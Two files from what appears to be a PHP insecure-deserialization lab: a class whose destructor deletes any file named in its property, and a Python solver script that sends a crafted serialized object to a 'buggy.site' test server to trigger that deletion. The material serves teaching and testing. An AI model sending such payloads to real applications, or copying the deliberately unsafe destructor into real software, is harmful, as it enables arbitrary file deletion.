File: code/src/Example1/Example1.php
<?php
/**
 * Created by PhpStorm.
 * User: Taras
 * Date: 26.08.18
 * Time: 6:52 PM
 */

namespace Examples\Example1;

class Example1
{
    private $fileName;

    public function __destruct()
    {
        if (file_exists($this->fileName)) {
            unlink($this->fileName);
        }
    }
}

File: code/solvers/example1.py
#!/usr/bin/python

import requests

if __name__ == '__main__':
    data = {'data': 'a:2:{s:4:"name";s:4:"User";s:4:"z123";O:26:"Examples\\Example1\\Example1":1:{s:36:"\0Examples\\Example1\\Example1\0fileName";s:10:"delete.me1";}}','XDEBUG_SESSION_START': 'PHPSTORM'}
    session = requests.session()

    response = session.get('http://buggy.site:8080/index.php', params=data)

    print response.text.encode('utf-8')